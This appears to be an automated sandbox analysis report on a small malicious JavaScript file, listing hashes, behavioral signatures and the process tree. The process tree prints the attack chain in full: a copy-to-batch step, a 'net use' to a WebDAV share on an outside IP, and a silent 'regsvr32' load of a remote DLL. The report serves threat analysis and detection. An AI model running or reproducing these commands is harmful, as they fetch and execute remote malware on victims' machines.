Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
09/07/2024, 06:03
Static task
static1
Behavioral task
behavioral1
Sample
2335478253155930819.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
2335478253155930819.js
Resource
win10v2004-20240704-en
General
-
Target
2335478253155930819.js
-
Size
5KB
-
MD5
002955be68807c970f57d24ad22e88b6
-
SHA1
907ba3d847aeb2f50c43d16b14ffb5f926f7050c
-
SHA256
48097f32070f8da978b66fee3bf3309526f84348971a5a5b550f47cc3b816766
-
SHA512
e42c629c4c3c18644483ecc87aaa7a45e1ceea4ccbb138aecdee71cecd126ee009c1478da422e11bcec70501494599020ad9ffaf1024842a9bbe0a19942cea04
-
SSDEEP
96:scSXa8NdjB2cPLQalb/WwFvYUmD8kw2mezwzuomnUskE:scMa42QLQalbxgPD8mmezwzuomnUskE
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2620 regsvr32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2408 wrote to memory of 1788 2408 wscript.exe 28 PID 2408 wrote to memory of 1788 2408 wscript.exe 28 PID 2408 wrote to memory of 1788 2408 wscript.exe 28 PID 1788 wrote to memory of 2636 1788 cmd.exe 30 PID 1788 wrote to memory of 2636 1788 cmd.exe 30 PID 1788 wrote to memory of 2636 1788 cmd.exe 30 PID 1788 wrote to memory of 2620 1788 cmd.exe 31 PID 1788 wrote to memory of 2620 1788 cmd.exe 31 PID 1788 wrote to memory of 2620 1788 cmd.exe 31 PID 1788 wrote to memory of 2620 1788 cmd.exe 31 PID 1788 wrote to memory of 2620 1788 cmd.exe 31
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\2335478253155930819.js1⤵
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\2335478253155930819.js" "C:\Users\Admin\\psrnzi.bat" && "C:\Users\Admin\\psrnzi.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:2636
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\362.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2620
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5002955be68807c970f57d24ad22e88b6
SHA1907ba3d847aeb2f50c43d16b14ffb5f926f7050c
SHA25648097f32070f8da978b66fee3bf3309526f84348971a5a5b550f47cc3b816766
SHA512e42c629c4c3c18644483ecc87aaa7a45e1ceea4ccbb138aecdee71cecd126ee009c1478da422e11bcec70501494599020ad9ffaf1024842a9bbe0a19942cea04